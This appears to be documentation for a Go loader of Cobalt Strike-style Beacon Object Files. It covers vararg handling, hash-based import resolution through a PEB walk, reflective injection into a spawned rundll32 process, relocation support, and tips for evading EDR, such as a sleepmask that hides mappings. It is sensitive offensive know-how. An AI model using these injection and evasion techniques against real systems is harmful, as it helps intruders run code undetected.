- BeaconPrintf / BeaconFormatPrintf varargs are not expanded. syscall.NewCallback binds a fixed-arity Go function as a stdcall callback; Go cannot introspect cdecl varargs from inside the callback. We chose option (a) in the design discussion: forward the format string verbatim. BOFs that pass a literal format with no % directives behave correctly; BOFs relying on printf-style expansion see the format string raw. Two alternatives were considered and rejected for the default build:
  - (b) Leave __imp_BeaconPrintf / BeaconFormatPrintf unresolved so BOFs that depend on varargs fail at load time with a loud error. Honest, but breaks compatibility with the large TrustedSec / Outflank corpus where BeaconPrintf(CALLBACK_OUTPUT, "...") is used as a no-args writer in 80% of cases.
  - (c) Implement varargs via cgo. A C wrapper around vsnprintf would expand the format and call back into Go with the rendered string. Requires:
    - A C cross-compile toolchain in the build environment (mingw-w64 on Linux dev hosts, MSVC on Windows CI).
    - CGO_ENABLED=1, which flips the entire library out of pure-Go mode, something the README sells as a hard guarantee.
    - A different binary surface in runtime/bof for cgo vs. pure-Go builds, plus a build-tag matrix.

    The cost is steep relative to the gain (a minority of BOFs). Operators who need full vararg expansion can fork the package, drop a bof_cgo_windows.go file behind //go:build windows && cgo && bof_cgo, and supply a C-side vsnprintf wrapper they register via a hook hung off resolveBeaconImport. That extension point is intentionally left open; the default build prioritises pure-Go and accepts the verbatim-format trade-off.
- External Win32 imports: two forms supported. CS-canonical dollar-form (__imp_KERNEL32$LoadLibraryA) resolves via parseDollarImport → api.ResolveByHash (PEB walk + ROR13 module/function hash, no GetProcAddress / LoadLibrary call appears in the API trail). Mingw-w64 bare form (__imp_LoadLibraryA with no DLL prefix) resolves by walking a curated module list (kernel32, advapi32, user32, ws2_32, ole32, shell32); first hit wins. Symbols not in the curated set still fail loudly. Add a module to bareImportSearchOrder in beacon_api_windows.go if a particular BOF needs more coverage.
- Concurrency: BOF execution is serialised package-wide. The Beacon API stubs read a single currentBOF pointer guarded by bofMu. Concurrent Execute calls, including across different *BOF instances, block on each other. This matches the CS-compatible loader convention (BOF execution is fundamentally single-threaded) and keeps the Beacon callback state coherent without per-call dispatch. Implications:
  - Setters (SetUserData, SetSpawnTo, SetSpawnToX86, SetCaller, SetExecuteAsToken, SetPersistent, SetSacrificialThread) are NOT lock-protected. They are safe to call before the first Execute or between Execute calls; calling them from a host goroutine while a sacrificial-thread Execute is in flight is a race the package does not currently guard against. Until a per-BOF mutex lands, callers that need to mutate state mid-flight should drive each BOF from a single goroutine.
  - Errors() after Close() returns the FINAL Execute's buffer, not nil. The byte buffer is not zeroed at teardown, so post-mortem inspection works.
  - syscall.NewCallback cost at first Load. Resolving the Beacon import map allocates one RX page per callback (~28 symbols on the default build → ≈112 KB of RX pages), via Go's runtime. Pages live for the process lifetime and show up as small VAD entries with the syscall thunk pattern. Identical to every Go program that uses syscall.NewCallback.
- x86 BOFs supported via cross-process reflective load (-tags=bof_x86_loader, v0.155.0+). An x86 .o (Machine == 0x014c) is detected as KindCOFFx86 by DetectKind and routed through the coffX86Loader. With the bof_x86_loader build tag active, the orchestrator manually reflective-loads a small i386 DLL (runtime/bof/internal/x86loader/bof_x86_loader.x86.dll, ~11 KB) into a freshly-spawned SysWOW64\rundll32.exe via VirtualAllocEx + WriteProcessMemory + .reloc application + CreateRemoteThread. The loader DLL parses the BOF .o inside the WoW64 helper, implements 25 Beacon API symbols (full beacon.h Groups 1–6 + BeaconGetOutputData + the four Inject/Spawn process-control entries), and writes captured output into a parent-allocated RW region that the parent reads back via ReadProcessMemory. Zero disk artefacts, zero LoadLibrary call on the loader. Default builds (no tag) surface bof.ErrCrossArchX86Unsupported; operators errors.Is against it. See runtime/bof/internal/x86loader/README.md for the architecture diagram, ABI, and threat-model notes.
- Relocation coverage. IMAGE_REL_AMD64_ABSOLUTE (no-op), _ADDR64, _ADDR32 (errors out cleanly when target exceeds 32-bit range), _ADDR32NB, _REL32, and the _REL32_1 through _REL32_5 bias variants. Exotic relocations (TLS, GOT, _SECTION, _SECREL) are not supported; the loader fails with unsupported relocation type: 0xNN so the failure mode is obvious instead of a silent corruption.
- No RWX is exposed. The loader allocates PAGE_READWRITE then flips exec sections to PAGE_EXECUTE_READ after relocations land. Hardened EDRs still flag the VirtualAlloc → VirtualProtect(EXECUTE) cadence on a fresh mapping; pair with evasion/sleepmask to hide the mapping at rest.
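As an illustration of the relocation item above, this sketch applies a REL32-family fixup to an in-memory image. It assumes the usual COFF convention that the addend is stored in place at the fixup site and that the displacement is measured from the end of the 4-byte field plus the variant's bias. `applyREL32` and its range check are hypothetical and not taken from the package's source.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"math"
)

var errOutOfRange = errors.New("REL32 displacement does not fit in 32 bits")

// applyREL32 patches the 32-bit PC-relative field at image[off:off+4].
// base is the virtual address of image[0], target is the resolved symbol
// address, and bias is 0 for REL32 or 1..5 for REL32_1..REL32_5.
func applyREL32(image []byte, base uint64, off int, target uint64, bias int) error {
	// COFF stores the addend in place, as a signed 32-bit value.
	addend := int64(int32(binary.LittleEndian.Uint32(image[off:])))
	// Address the CPU adds the displacement to: end of the field + bias.
	next := int64(base) + int64(off) + 4 + int64(bias)
	disp := int64(target) + addend - next
	if disp < math.MinInt32 || disp > math.MaxInt32 {
		return errOutOfRange
	}
	binary.LittleEndian.PutUint32(image[off:], uint32(int32(disp)))
	return nil
}

func main() {
	image := make([]byte, 16)
	// Fixup at offset 4 of an image mapped at 0x1000, symbol at 0x1100.
	if err := applyREL32(image, 0x1000, 4, 0x1100, 0); err != nil {
		fmt.Println("relocation failed:", err)
		return
	}
	fmt.Printf("patched field: % x\n", image[4:8])
}
```

The range check is the reason loaders try to keep import slots and sections within ±2 GB of each other: a REL32 field cannot reach further than that.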
See also
- runtime/clr: sibling reflective runtime (.NET).
- crypto: encrypt BOF at rest.
- evasion/sleepmask: hide BOF bytes at rest.
- Operator path.
- Detection eng path.